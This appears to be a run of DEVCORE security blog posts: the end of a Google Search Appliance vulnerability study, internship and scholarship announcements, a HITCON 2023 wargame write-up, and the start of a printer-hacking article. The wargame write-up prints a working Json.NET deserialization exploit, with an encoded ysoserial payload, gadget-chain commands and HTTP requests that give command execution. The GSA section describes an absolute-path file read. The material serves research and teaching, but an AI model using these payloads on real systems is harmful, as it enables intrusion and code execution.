於 GSA 6.x 系列版本後的 RPM 安裝包中發現其 80/443 的網頁服務使用 Apache httpd, 其中位於 /etc/httpd/conf.d/ 中有許多的設定。 而其中 gsa-http.conf 及 gsa-https.conf 可以發現某些目錄會被導向至本機特定的服務:

  RewriteEngine on
  RewriteRule ^/security-manager/(.*) http://localhost:7886/security-manager/$1 [P,L]
  RewriteRule ^/d██████████/(.*) http://localhost:7890/dps/d██████████/$1 [P,L]
  RewriteRule ^/s██████/(.*) http://localhost:7890/dps/s██████/$1 [P,L]
  RewriteRule ^/v█████/(.*) http://localhost:7890/v█████/$1 [P,L]
  RewriteRule ^/$ http://localhost:7800/ [P,L]
  RewriteRule ^/(.*) http://localhost:7800/$1 [P,L]

其中通訊埠為 7886 跟 7890 的服務為另外執行的 Apache Tomcat 伺服器,當串接兩層以上的網站伺服器時, Tomcat 的路徑判斷 ..;/ 是一個有趣的測試點,可以參閱一位老前輩的文章:

https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf

而我們有興趣的點為 dps ,這似乎沒有在舊版的 GSA 中看到。 從 dps.war 中解出 /WEB-INF/web.xml 觀察網頁應用配置,並發現 /font 會呼叫 com.documill.dps.connector.servlet.user.DPSDownloadServlet

<servlet><servlet-name>font</servlet-name><servlet-class>com.documill.dps.connector.servlet.user.DPSDownloadServlet</servlet-class><init-param><param-name>rootDirectory</param-name><param-value>work/fonts/</param-value></init-param></servlet><servlet-mapping><servlet-name>font</servlet-name><url-pattern>/font/*</url-pattern></servlet-mapping>

接著查看 DPSDownloadServlet:

importcom.davisor.net.servlet.DownloadServlet;importcom.documill.dps.*;importjava.io.*;importjavax.servlet.ServletContext;publicclassDPSDownloadServletextendsDownloadServletimplementsDPSUserService{publicDPSDownloadServlet(){}protectedStringgetRealPath(ServletContextservletcontext,Strings)throwsIOException{DPSdps=DPSSingleton.getDPS();Filefile=dps.getHomeDir();if(file==null)thrownewFileNotFoundException("DPSDownloadServlet:getRealPath:DPS home directory not specified");elsereturn(newFile(file,s)).getAbsolutePath();}privatestaticfinallongserialVersionUID=0L;}

發現此類別是繼承自 com.davisor.net.servlet.DownloadServlet,跟進此類別:

protectedvoidservice(HttpServletRequesthttpservletrequest,HttpServletResponsehttpservletresponse)throwsServletException,IOException{Strings=httpservletrequest.getParameter(uriParameterName);if(!isValid(s)){httpservletresponse.sendError(400,(newStringBuilder()).append("Invalid file path: ").append(s).toString());return;}Filefile=rootDirectory.deriveFile(s);if(!file.isFile())httpservletresponse.sendError(404,(newStringBuilder()).append("No file:").append(s).toString());elseif(!file.canRead()){httpservletresponse.sendError(403,(newStringBuilder()).append("Unreadable file:").append(s).toString());}else{longl=file.length();if(l>0x7fffffffL){httpservletresponse.sendError(413,(newStringBuilder()).append("File too big:").append(l).toString());}else{Strings1=MIME.getTypeFromPath(file.getName(),"application/octet-stream");httpservletresponse.setContentLength((int)l);httpservletresponse.setContentType(s1);httpservletresponse.setDateHeader("Last-Modified",file.lastModified());if(cacheExpires>0L){httpservletresponse.setDateHeader("Expires",System.currentTimeMillis()+cacheExpires);httpservletresponse.setHeader("Cache-Control","public");}IO.copy(file,httpservletresponse.getOutputStream());}}}privatestaticbooleanisValid(Strings){return!Strings.isEmpty(s)&&!s.contains("..");}

可以發現此處只有檢查字串是否含有 ..,但我們可以直接指定絕對路徑。 並直接讀取本機任意檔案!

舊版GSA 沒有 /font 這個端點,但 /dps/admin 有類似的讀檔問題,可以直接指定 logName 進行檔案讀取, 可參考下圖直接讀取系統管理介面帳號密碼檔:

成功破解雜湊後,登入後可以開啟 SNMP 服務配合第一個漏洞並以 root 權限執行任意指令。

其他發現跟整理

服務本身內部網址

GSA 中有許多的子服務間使用 HTTP 傳輸協定溝通,而在許多服務都有提供 /varz、/helpz、/procz 等網址, 可以在服務定義的信任網路位置或 127.0.0.1 中存取:

而在 vGSA 中觀察到服務執行參數有 useripheader=X-User-Ip,導致對外開放的管理介面可以帶入 X-User-IP 請求頭後直接存取此功能:

/procz 端點甚至可以抓取執行檔及使用到的共享函示庫:

型號整理

型號製造商及型號硬體規格版號文件數量
Google MiniGigabytePentium III 1G / 2GB memory / 120G3.4.14300,000
Google Mini-002XSuperMicroPentium 4 3G / 2GB memory / 250G HDD5.0.0未知
Google GB-1001Dell Poweredge 2950Xeon / 16GB memory / 1.25TB HDD未知3,000,000
Google GB-1002Gigabyte未知未知未知
Google GB-7007Dell R710Xeon E5520 / 48GB memory / 3TB HDD未知10,000,000
Google GB-9009未知Xeon X5560 / 96GB memory / 3.6TB HDD未知30,000,000
Google G100Dell R720XD未知未知未知
Google G500未知未知未知未知

核心版本

GSA 版本核心版本
7.6.0Linux version 3.14.44_gsa-x64_1.5 (mrevutskyi@mrevutskyi.mtv.corp.google.com) (gcc version 4.9.x-google 20150123 (prerelease) (Google_crosstoolv18-gcc-4.9.x-x86_64-grtev4-linux-gnu) ) #1 SMP Mon Nov 23 09:19:11 PST 2015
7.4.0未知
7.2.0Linux version 3.4.3_gsa-x64_1.5 (martincochran@ypc-ubiq202.dls.corp.google.com) (gcc version 4.6.x-google 20120601 (prerelease) (Google_crosstoolv15-gcc-4.6.x-glibc-2.11.1-grte) ) #1 SMP Tue Jul 9 15:36:01 PDT 2013
7.0.14Linux version 3.4.3_gsa-x64_1.3 (stephenamar@neutrino.mtv.corp.google.com) (gcc version 4.6.x-google 20120601 (prerelease) (Google_crosstoolv15-gcc-4.6.x-glibc-2.11.1-grte) ) #1 SMP Thu Jul 19 11:59:57 PDT 2012
5.2.0Linux version 2.6.20_vmw-smp_3.1 (yifeng@yifeng.corp.google.com) (gcc version 4.1.1) #1 SMP Thu Jan 24 22:34:28 PST 2008

時間軸

時間事件
2005/06/10Java Code Injection CVE-2005-3757被 H D Moore 回報
2008 上半年釋出 GSA 5.0
2008/10/28釋出 vgsa_20081028.7z (5.2.0)
2013/04/20釋出 GSA 6.14.0.G28
2014/03/20XSS 漏洞 CVE-2014-0362被 Will Dormann 回報
2014/10/01釋出 GSA 7.0.14.G238
2014/10/03釋出 GSA 7.2.0.G252
2014/12/12釋出 GSA 7.2.0.G264
2015/02/07釋出 GSA 7.2.0.G270
2015/04/15釋出 GSA 7.4.0.G64
2015/04/22釋出 GSA 7.4.0.G72
2015/04/30釋出 GSA 7.4.0.G74
2015/06/04釋出 GSA 7.4.0.G82
2016 上半年Google 宣布 GSA 將會逐步退出市場
2016/01/05XML 外部實體攻擊 被 Timo 回報
2016/05/24釋出 GSA 7.6.0.G36
2016/07/01釋出 GSA 7.6.0.G42
2016/07/31本文作者取得此設備,版本為 7.0.14
2016/08/25釋出 GSA 7.6.0.G46
2016/10/21釋出 GSA 7.6.0.G58
2017/01/19釋出 GSA 7.6.50.G30
2017/04/19釋出 GSA 7.6.50.G36
2017/07/28釋出 GSA 7.6.50.G64
2017/11/09釋出 GSA 7.6.250.G12
2017/12/28最後能訂購 GSA 的日期
2018/01/17釋出 GSA 7.6.250.G20
2018/03/21釋出 GSA 7.6.250.G26
2018/06/15釋出 GSA 7.6.360.G10
2018/10/08釋出 GSA 7.6.360.G16
2019/04/26釋出 GSA 7.6.512.G18,應該為最後一個版本
2021/08/16回報漏洞
2021/08/16收到機器人回應確認收到回報信件
2021/08/16問題於 issuetracker.google.com 被指派
2021/08/18Google 提示漏洞不符合獎金條件,但會於下次會議再次討論
2021/08/20確認漏洞不發放獎金
2021/11/01詢問漏洞是否會指派 CVE 漏洞編號
2021/11/02確認不會有 CVE 漏洞編號
2023 上半年開始編寫文章
2023/06/04初稿完成

結論

雖然 GSA/vGSA 已經是結束生命周期的產品,但研究 Google 如何對設備去增加產品的安全性及減少攻擊向量 可以增加平常較少接觸的知識面。雖然文中沒有詳細說明,包含如使用 Java 的 Security Manager, Linux Kernel 的 seccomp 都是 GSA 中有使用的技術,而本次研究中也留下一些可供後續研究的目標:

  • feedergate 服務
  • Oracle 的 Outside-in Technology 轉換文件格式的記憶體漏洞
  • convert_to_html seccomp sandbox

有研究成果時再跟大家分享,下次見。

其他參考網址

DEVCORE 2023 第四屆實習生計畫

$
0
0

DEVCORE 創立迄今已逾十年,持續專注於提供主動式資安服務,並致力尋找各種安全風險及漏洞,讓世界變得更安全。為了持續尋找更多擁有相同理念的資安新銳、協助學生建構正確資安意識及技能,我們成立了「戴夫寇爾全國資訊安全獎學金」,2022 年初也開始舉辦首屆實習生計畫,目前為止成果頗豐、超乎預期,第三屆實習生計畫也將於今年 7 月底告一段落。我們很榮幸地宣佈,第四屆實習生計畫即將登場,若您期待加入我們、精進資安技能,煩請詳閱下列資訊後來信報名!

實習內容

本次實習分為 Binary 及 Web 兩個組別,主要內容如下:

  • Binary 以研究為主,在與導師確定研究標的後,分析目標架構、進行逆向工程或程式碼審查。藉由這個過程訓練自己的思路,找出可能的攻擊面與潛在的弱點。另外也會讓大家嘗試分析及寫過往漏洞的 Exploit,理解過去漏洞都出現在哪,體驗真實世界的漏洞都是如何利用。
    • 漏洞挖掘及研究 70 %
    • 1-day 開發 (Exploitation) 30 %
  • Web 導師會與學生討論並確定一個以學生的期望為主的實習目標,並在過程輔導成長以完成目標,內容可以是深入研究近年常見新型態漏洞、攻擊手法、開源軟體,或是程式語言生態系的常見弱點,亦或是展現你的技術力以開發與紅隊相關的工具。
    • 漏洞、攻擊手法或開發工具研究 90%
    • 成果報告與準備 10%

公司地點

台北市松山區八德路三段 32 號 13 樓

實習時間

  • 2023 年 9 月開始到 2024 年 1 月底,共 5 個月。
  • 每週工作兩天,工作時間為 10:00 – 18:00
    • 每週固定一天下午 14:00 - 18:00 必須到公司討論進度
      • 如果居住雙北外可彈性調整(但須每個組別統一)
    • 其餘時間皆為遠端作業

招募對象

具有一定程度資安背景的學生,且可每週工作兩天。

預計招收名額

  • Binary 組:2~3 人
  • Web 組:2~3 人

薪資待遇

每月新台幣 16,000 元

招募條件資格與流程

實習條件要求

Binary

  • 基本逆向工程及除錯能力
    • 能看懂組合語言並瞭解基本 Debugger 使用技巧
  • 基本漏洞利用能力
    • 須知道 Stack overflow、ROP 等相關利用技巧
  • 基本 Scripting Language 開發能力
    • Python、Ruby
  • 具備分析大型 Open Source 專案能力
    • 以 C/C++ 為主
  • 具備基礎作業系統知識
    • 例如知道 Virtual Address 與 Physical Address 的概念
  • Code Auditing
    • 知道怎樣寫的程式碼會有問題
      • Buffer Overflow
      • Use After free
      • Race Condition
  • 具備研究熱誠,習慣了解技術本質
  • 加分但非必要條件
    • CTF 比賽經驗
    • pwnable.tw 成績
    • 樂於分享技術
      • 有公開的技術 blog/slide、Write-ups 或是演講
    • 精通 IDA Pro 或 Ghidra
    • 有寫過 1-day 利用程式
    • 具備下列其中之一經驗
      • Kernel Exploit
      • Windows Exploit
      • Browser Exploit
      • Bug Bounty

Web

  • 熟悉 OWASP Web Top 10。
  • 理解 PortSwigger Web Security Academy 中所有的安全議題或已完成所有 Lab。
    • 參考連結:https://portswigger.net/web-security/all-materials
  • 理解計算機網路的基本概念。
  • 熟悉 Command Line 操作,包含 Unix-like 和 Windows 作業系統的常見或內建系統指令工具。
  • 熟悉任一種網頁程式語言(如:PHP、ASP.NET、JSP),具備可以建立完整網頁服務的能力。
  • 熟悉任一種 Scripting Language(如:Shell Script、Python、Ruby),並能使用腳本輔以研究。
  • 具備除錯能力,能善用 Debugger 追蹤程式流程、能重現並收斂問題。
  • 具備可以建置、設定常見網頁伺服器(如:Nginx、Apache)及作業系統(如:Linux)的能力。
  • 具備追根究柢的精神。
  • 加分但非必要條件
    • 曾經獨立挖掘過 0-day 漏洞。
    • 曾經獨立分析過已知漏洞並能撰寫 1-day exploit。
    • 曾經於 CTF 比賽中擔任出題者並建置過題目。
    • 擁有 OSCP 證照或同等能力之證照。

應徵流程

本次甄選一共分為二個階段:

第一階段:書面審查

第一階段為書面審查,會需要審查下列兩個項目

  • 履歷內容
  • 簡答題答案
    • 題目 1:請提出三個,你印象最深刻或感到有趣、於西元 2021 ~ 2023 年間公開的真實漏洞或攻擊鏈案例,並依自己的理解簡述說明各個漏洞的成因、利用條件和可以造成的影響。
    • 題目 2:實習期間想要研究的主題,請提出三個可能選擇的明確主題,並簡單說明提出的理由或想完成的內容,例如:
      • 研究◯◯開源軟體,找到可 RCE 的重大風險弱點。
      • 研究 AD CS 的攻擊手法,嘗試挖掘新的攻擊可能性或向量。
      • 研究常見的路由器,目標包括:AA-123 路由器、BB-456 無線路由器。

本階段收件截止時間為 2023/08/11 23:59,我們會根據您的履歷及題目所回答的內容來決定是否有通過第一階段,我們會在 10 個工作天內回覆。

第二階段:面試

此階段為 30~120 分鐘(依照組別需求而定,會另行通知)的面試,會有 2~3 位資深夥伴參與,評估您是否具備本次實習所需的技術能力與人格特質。

時間軸

  • 2023/07/19 - 2023/08/11 公開招募
  • 2023/08/14 - 2023/08/24 面試
  • 2023/08/28 前回應結果
  • 2023/09/04 第四屆實習計畫於當週開始

報名方式

  • 請將您的履歷題目答案以 PDF 格式寄到 recruiting_intern@devco.re
    • 履歷格式請參考範例示意(DOCXPAGESPDF)並轉成 PDF。若您有自信,也可以自由發揮最能呈現您能力的履歷。
    • 請於 2023/08/11 23:59前寄出(如果名額已滿則視情況提早結束)
  • 信件標題格式:[應徵] 職位 您的姓名(範例:[應徵] Web 組實習生 王小美)
  • 履歷內容請務必控制在三頁以內,至少需包含以下內容:
    • 基本資料
    • 學歷
    • 實習經歷
    • 社群活動經歷
    • 特殊事蹟
    • 過去對於資安的相關研究
    • MBTI 職業性格測試結果(測試網頁

若有應徵相關問題,請一律使用 Email 聯繫,如造成您的不便請見諒,我們感謝您的來信,並期待您的加入!

視人才培育為己任 DEVCORE 全國資訊安全獎學金、資安教育活動贊助計畫即日起開放報名

$
0
0

DEVCORE 今(30)日甫於輔仁大學舉辦「戴夫寇爾資訊安全獎學金」2023 年度頒獎典禮,共有 3 位資工系同學獲獎。同一時間,我們很高興地宣佈,今年度我們也將續辦「全國資訊安全獎學金」及「資安教育活動贊助計畫」,即日起開放報名!

近年來,無論是政府或企業,在數位浪潮及雲世代的推波助瀾下,無不開始正視資安人才荒的困境。自 2012 年創立之初,DEVCORE 即秉持著提升台灣資安競爭力、讓世界更安全的初衷,將人才培育視為己任,透過參與教育部資安人才培育計畫、創辦 DEVCORE 實習生計畫、啟動戴夫寇爾資安獎學金、辦理資安教育活動贊助計畫等方式,協助資安人才茁壯成長。

DEVCORE 全國資訊安全獎學金

戴夫寇爾資安獎學金於 2020 年首次頒發,原為感念過去在學生時代時受到的各方資源及鼓勵,獎學金頒發範圍為經營團隊母校的輔仁大學及國立臺灣科技大學,後為培育更多有志於此的青年學子,我們於去年擴大獎學金範圍,開放全國各地的資安新銳報名申請,期待能推廣「駭客思維」、強化資安技能,並幫助在學學生了解資安產業生態及現況、降低學用落差,未來成為新一代的攻擊型資安人才,為資安產業注入新活力。

「戴夫寇爾全國資訊安全獎學金」歡迎所有在資訊安全領域有出眾研究成果的學生報名申請,有意申請者須提出學習資安的動機與歷程,並繳交資安研究或比賽成果,我們將從中擇優選取 10 名,獲選者可獲最高 2 萬元的研究補助。詳細申請辦法如下:

  • 申請資格:全國各大專院校學生皆可以申請。
  • 獎學金金額/名額:每年度取 10 名,每名可獲得獎學金新台幣 20,000 元整,共計 20 萬元。如報名踴躍我們將視申請狀況增加名額。
  • 申請時程:
    • 2023/8/30 官網公告獎學金計畫資訊
    • 2023/8/31 - 2023/9/30 開放收件
    • 2023/10/31 公布審查結果,並將於 11 至 12 月間頒發獎學金
  • 申請辦法:
    • 請依⽂件檢核表項次順序排列已附⽂件,彙整為⼀份 PDF 檔案,寄⾄ scholarship@devco.re。
    • 信件主旨及 PDF 檔案名稱請符合以下格式:[全國獎學⾦申請] 學校名稱_學號_姓名(範例:[全國獎學⾦申請] 輔仁⼤學_B11100000_王⼩美)。
    • 請申請⼈⾃我檢核並於申請⼈檢核區勾選已附⽂件,若⽂件不⿑或未確實勾選恕不受理申請。
  • 須檢附文件:
    • 本獎學⾦申請表
    • 在學證明
    • 最近⼀學期成績單
    • 學習資訊安全之動機與歷程⼼得⼀篇:字數 500 - 2000 字
    • 資訊安全技術相關研究成果:至少須從以下六項目中擇一繳交,包含研討會投稿結果、漏洞獎勵計畫成果、弱點研究成果、資訊安全比賽成果、資安工具研究成果、技術文章發表成果等
    • 社群經營成果:至少須從以下兩項目中擇一繳交,包含校園資安社團、公開資安社群等
    • 推薦函:導師、系主任、其他教授或業界⼈⼠推薦函,⾄少須取得兩封以上推薦函

DEVCORE 資安教育活動贊助計劃

取之於社會,用之於社會。DEVCORE 創立至今已準備邁入第 11 年,我們期待能以不同的方式加深校園與產業的連結,推廣正確的資安意識及駭客思維,協助台灣資安人才成長茁壯。

今年我們也將持續贊助資安教育活動,提供經費予資安相關之社群、社團辦理各項活動,凝聚台灣資安社群,加速培育台灣的資安新銳。

  • 申請資格:與資安議題相關之社群、社團活動,請由 1 位社團代表人填寫資料。
  • 贊助金額:依各社團活動需求及與戴夫寇爾討論而定,每次最高補助金額為新台幣 20,000 元整。
  • 申請時程:如欲申請此計畫的社團或活動,請於 2023/10/31 前透過以下連結填寫初步資料,我們會在 30 日內通知符合申請資格者提供進一步資料,不符合資格者將不另行通知。
  • 申請連結:DEVCORE 2023 年資安教育活動贊助調查
  • 須提供資料:
    • 申請資格:申請人需以各資安社群或社團名義提出申請。
    • 聯絡電子郵件
    • 想要辦理的活動類型
    • 想要辦理的活動方式
    • 活動總預算
    • 預計需要贊助金額
    • 代表人姓名、連絡電話
    • 團體名稱
    • 團體單位網址
  • 注意事項:
    • 申請案審核將經過戴夫寇爾內部審核機制,並保有最終核決權。
    • 本問卷僅供初步意願蒐集用途,符合申請資格者,戴夫寇爾將於 30 日內通知提供進一步資料供審核,其餘將不另行通知。

HITCON 2023 x DEVCORE Wargame: My todolist Write-up

$
0
0

為了 HITCON 2023 活動,我今年也在 DEVCORE 攤位上準備了三題趣味性質的 Wargame 題目讓參賽者在聽完議程的空閒之餘可以享受一下親自動手解題的快樂,而除了我所準備的題目以外,包括其他所有題目都可以在以下的 GitHub repository 裡找到:https://github.com/DEVCORE-Wargame/HITCON-2023

這次準備的題目分別是 What’s my IP、Submit flag 和 My todolist。第一個題目 What’s my IP 只要看程式碼就會知道是個 HTTP header 偽造 IP 加上 SQL Injectin 利用的簡單題,只是活動期間參賽者們得憑著經驗與駭客直覺以黑箱方式找出弱點的存在。第二個題目 Submit flag 就是一個經典的 Race Condition,是一個老梗但也是滲透測試中經常被忽略的細節,為了提高成功率從而避免讓參加者浪費太多時間,我特地在中間插入不必要的 sleep,雖然可能讓題目變得過於簡單,希望至少能提醒大家回想起還存在這種弱點就太好了。

最後一個題目也是本篇文章想要和大家分享的主題:My todolist。從結論而言,這是一個簡單的 Json.NET 反序列化漏洞的白箱題目,存在漏洞的位置是在程式碼 Extensions/WebExtension.cs的第 20 行,但我想稍微和大家分享題目的由來。

題目起源於我曾經在某些程式中看過類似以下的 Deep Copy 實作:

publicstaticTClone<T>(thisTsource){JsonSerializerSettingssettings=newJsonSerializerSettings(){TypeNameHandling=TypeNameHandling.All};return(T)JsonConvert.DeserializeObject(JsonConvert.SerializeObject(source,settings),settings);}

我們都知道當 DeserializeObject 的來源字串可以控制並且開啟 TypeNameHandling 時,我們可以輕易利用反序列化能初始化任意物件的特性執行任意程式碼或系統指令,然而在 Deep Clone 的使用情境下,來源字串是 SerializeObject 的輸出結果,這代表著任何標記物件名稱的 $type 屬性也是由 Json.NET 所控制而非由我們控制,所以這表示這段程式碼應該是無法被利用的才對,除非,若我們可以覆蓋 $type 屬性的話呢?

這個疑問勾起了我的好奇心,因此讓我決定進行一些嘗試,當我嘗試用以下程式碼序列化一個 Dictionary 物件時,我得到了一個有趣的結果。

Dictionary<string,string>source=newDictionary<string,string>();source.Add("key","value");JsonSerializerSettingssettings=newJsonSerializerSettings(){TypeNameHandling=TypeNameHandling.All};stringresult=JsonConvert.SerializeObject(source,settings);

結果:

{"$type":"System.Collections.Generic.Dictionary`2[[System.String, mscorlib],[System.String, mscorlib]], mscorlib","key":"value"}

當我們序列化 Dictionary 時,我們所插入的任何 key 和 value 的 pair 都和 $type屬性值在同一個層級,那假設我們 Dictionary 內含有值為 $type的 key 時,會發生什麼事情?

Dictionary<string,string>source=newDictionary<string,string>();source.Add("$type","System.Web.Security.RolePrincipal, System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a");JsonSerializerSettingssettings=newJsonSerializerSettings(){TypeNameHandling=TypeNameHandling.All};JsonConvert.DeserializeObject(JsonConvert.SerializeObject(source,settings),settings);

會得到一個例外錯誤:

Newtonsoft.Json.JsonSerializationException: ‘Type specified in JSON ‘System.Web.Security.RolePrincipal, System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a’ is not compatible with ‘System.Collections.Generic.Dictionary`2[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089’. Path ‘$type’, line 1, position 236.’

若建立 debug 斷點將 JsonConvert.SerializeObject 的結果字串印出來會得到:

{"$type":"System.Collections.Generic.Dictionary`2[[System.String, mscorlib],[System.String, mscorlib]], mscorlib","$type":"System.Web.Security.RolePrincipal, System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a"}

其實從這段錯誤訊息就可以猜測出大致出錯的可能性,如果再稍微追入程式碼就會發現,我們設定的第二個 $type 確實成功讓 Json.NET 嘗試去覆蓋第一個 $type 指定的物件類型,但 Json.NET 在這段的處理會檢查第二個物件類型是否能夠相容於第一個物件類型,也就是檢查是否 assignable,若我們能找到某個類 Dictionary 物件可以成為 gadget 的話,這段程式碼也許將成為 exploitable。

但要挖掘新的 gadget 十分困難,而且就算找到了,要作為 Wargame 題目也可能過於刁難,所以我這邊找到了一種變種情境,雖然是不常見的設定,但我覺得作為一道題目情境的話會非常有趣。

這個題目情境的關鍵是 MetadataPropertyHandling.ReadAhead這個設定值,當提供給 JsonConvert.DeserializeObject 的 JsonSerializerSettings 中有包含 MetadataPropertyHandling.ReadAhead 時,它會假設 $type 不是在第一個屬性值的位置,這會導致 Json.NET 先嘗試從頭到尾把 JSON 解析完並找出 $type 後才開始建立物件,在此情境下也會讓我們注入的第二個 $type 直接覆蓋第一個 $type 的值,所以假如程式碼改寫為如下的程式碼時,這個 Clone function 將會變得 exploitable。

Dictionary<string,string>source=newDictionary<string,string>();source.Add("you control the key","you control the value");JsonSerializerSettingssettings=newJsonSerializerSettings(){TypeNameHandling=TypeNameHandling.All,MetadataPropertyHandling=MetadataPropertyHandling.ReadAhead};JsonConvert.DeserializeObject(JsonConvert.SerializeObject(source,settings),settings);

我們可以來實際利用一個 gadget 進行 code execution 測試,這邊我使用 ysoserial.net 產生 RolePrincipal gadget 的 payload ( ysoserial.exe -g RolePrincipal -f Json.Net -c calc ),因為這個 gadget 只需要控制 JSON 一層的字串就可以執行指令,題目情境相對容易建構。

測試執行:

Dictionary<string,string>source=newDictionary<string,string>();source.Add("$type","System.Web.Security.RolePrincipal, System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a");source.Add("System.Security.ClaimsPrincipal.Identities","AAEAAAD/////AQAAAAAAAAAMAgAAAF5NaWNyb3NvZnQuUG93ZXJTaGVsbC5FZGl0b3IsIFZlcnNpb249My4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0zMWJmMzg1NmFkMzY0ZTM1BQEAAABCTWljcm9zb2Z0LlZpc3VhbFN0dWRpby5UZXh0LkZvcm1hdHRpbmcuVGV4dEZvcm1hdHRpbmdSdW5Qcm9wZXJ0aWVzAQAAAA9Gb3JlZ3JvdW5kQnJ1c2gBAgAAAAYDAAAAswU8P3htbCB2ZXJzaW9uPSIxLjAiIGVuY29kaW5nPSJ1dGYtMTYiPz4NCjxPYmplY3REYXRhUHJvdmlkZXIgTWV0aG9kTmFtZT0iU3RhcnQiIElzSW5pdGlhbExvYWRFbmFibGVkPSJGYWxzZSIgeG1sbnM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sL3ByZXNlbnRhdGlvbiIgeG1sbnM6c2Q9ImNsci1uYW1lc3BhY2U6U3lzdGVtLkRpYWdub3N0aWNzO2Fzc2VtYmx5PVN5c3RlbSIgeG1sbnM6eD0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwiPg0KICA8T2JqZWN0RGF0YVByb3ZpZGVyLk9iamVjdEluc3RhbmNlPg0KICAgIDxzZDpQcm9jZXNzPg0KICAgICAgPHNkOlByb2Nlc3MuU3RhcnRJbmZvPg0KICAgICAgICA8c2Q6UHJvY2Vzc1N0YXJ0SW5mbyBBcmd1bWVudHM9Ii9jIGNhbGMiIFN0YW5kYXJkRXJyb3JFbmNvZGluZz0ie3g6TnVsbH0iIFN0YW5kYXJkT3V0cHV0RW5jb2Rpbmc9Int4Ok51bGx9IiBVc2VyTmFtZT0iIiBQYXNzd29yZD0ie3g6TnVsbH0iIERvbWFpbj0iIiBMb2FkVXNlclByb2ZpbGU9IkZhbHNlIiBGaWxlTmFtZT0iY21kIiAvPg0KICAgICAgPC9zZDpQcm9jZXNzLlN0YXJ0SW5mbz4NCiAgICA8L3NkOlByb2Nlc3M+DQogIDwvT2JqZWN0RGF0YVByb3ZpZGVyLk9iamVjdEluc3RhbmNlPg0KPC9PYmplY3REYXRhUHJvdmlkZXI+Cw==");JsonSerializerSettingssettings=newJsonSerializerSettings(){TypeNameHandling=TypeNameHandling.All,MetadataPropertyHandling=MetadataPropertyHandling.ReadAhead};JsonConvert.DeserializeObject(JsonConvert.SerializeObject(source,settings),settings);

嘗試執行以上程式碼後,成功彈出計算機!

既然驗證此設定是可以 exploit 的,剩下就是包裝一個應用程式的情境,而最終趕出的成品就是 My todolist 這道題目。

理論上直接使用 RolePrincipal 就能執行系統指令了,只是這個 exploit 執行後不會有任何指令回顯,而我們還需要嘗試找到並讀取 flag,為了後續更便利操作,我們可以嘗試將漏洞轉換成 web shell,詳細可以參考我的另一篇文章「玩轉 ASP.NET VIEWSTATE 反序列化攻擊、建立無檔案後門!」,但這個方法的 gadget 是需要使用 BinaryFormatter 執行 OnDeserialization callback 進而觸發 gadget chain 的執行,但如果你有 clone 最新版本的 ysoserial.net 來自行編譯的話,會發現 help 訊息中多了一個新的參數 –bgc。

--bgc, --bridgedgadgetchains=VALUE
    Chain of bridged gadgets separated by comma (,). 
      Each gadget will be used to complete the next 
      bridge gadget. The last one will be used in the 
      requested gadget. This will be ignored when 
      using the searchformatter argument.

沒錯,為這個專案貢獻的研究者們成功找到 gadget chain 實現將 Json.NET 等需要 setter 類型的 gadget 的 formatter 轉換成 BinaryFormatter 的二次反序列化,從而可以執行更多的 gadget,其中當然就包括 ActivitySurrogateDisableTypeCheck 和 ActivitySurrogateSelectorFromFile 這兩個最重要的 gadget,我們也因此可以再次使用這個功能實現反序列化攻擊到 fileless webshell 的 exploit! 產生 payload 的指令:

ysoserial.exe -g RolePrincipal -f Json.Net --bgc ActivitySurrogateDisableTypeCheck -c 1

ysoserial.exe -g RolePrincipal -f Json.Net --bgc ActivitySurrogateSelectorFromFile -c ".\ExploitClass.cs;dlls\System.dll;dlls\System.Web.dll"

最後題目只要在正常註冊後隨便新增一個 note 進行修改,再分別對兩個 payload 執行一次類似下面的請求,就可以達成有回顯的 RCE 了!

Request 1:

POST/Api/UpdateTodoHTTP/1.1Host:localhost:8003Content-Type:application/x-www-form-urlencodedContent-Length:xxCookie:<session>

uuid=00c3abe9-1f7c-4cda-8c24-60c59ac01f3f&field=$type&value=System.Web.Security.RolePrincipal,+System.Web,+Version%3d4.0.0.0,+Culture%3dneutral,+PublicKeyToken%3db03f5f7f11d50a3a

Request 2:

POST/Api/UpdateTodoHTTP/1.1Host:localhost:8003Content-Type:application/x-www-form-urlencodedContent-Length:xxCookie:<session>

uuid=00c3abe9-1f7c-4cda-8c24-60c59ac01f3f&field=System.Security.ClaimsPrincipal.Identities&value=<payload>

Request 3:

POST/Api/MyProfileHTTP/1.1Host:localhost:8003Content-Type:application/x-www-form-urlencodedContent-Length:10Cookie:<session>

cmd=whoami

Your printer is not your printer ! - Hacking Printers at Pwn2Own Part I

$
0
0

Printer has become one of the essential devices in the corporate intranet in the past few years, and its functionalities have also increased significantly. Not only printing or faxing, cloud printing services like AirPrint are also supported to make it easier to use. Direct printing from mobile devices is now a basic requirement in the IoT era. We also use it to print some internal business documents of the company, which makes it even more important to keep the printer secure.

At 2021, we found Pre-auth RCE vulnerabilities(CVE-2022-24673 and CVE-2022-3942) in Canon and HP printers, and vulnerabilty(CVE-2021-44734) in Lexmark. We used these vulnerabilities to exploit Canon ImageCLASS MF644Cdw, HP Color LaserJet Pro MFP M283fdw and Lexmark MC3224i in Pwn2Own Austin 2021. Following we will describe the details of the Canon and HP vulnerabilities and exploitation.

This research is also presented at HITCON 2022 and CODE BLUE 2022. You can check the slides here.

Printer

In the early days, it often required an IEEE1284 or USB Printer cable to connect the printer to the computer. We also had to install the printer driver provided by the manufacturer. Nowadays, most of the printers on the market do not requires USB or traditional cable. As long as the printer is connected to the intranet through a LAN cable, we can find and utilize the printer immediately.

Printer also provides not only printing but also various services such as FTP, AirPrint, Bonjour. Nothing more than to make printing more convenient.

Motivation

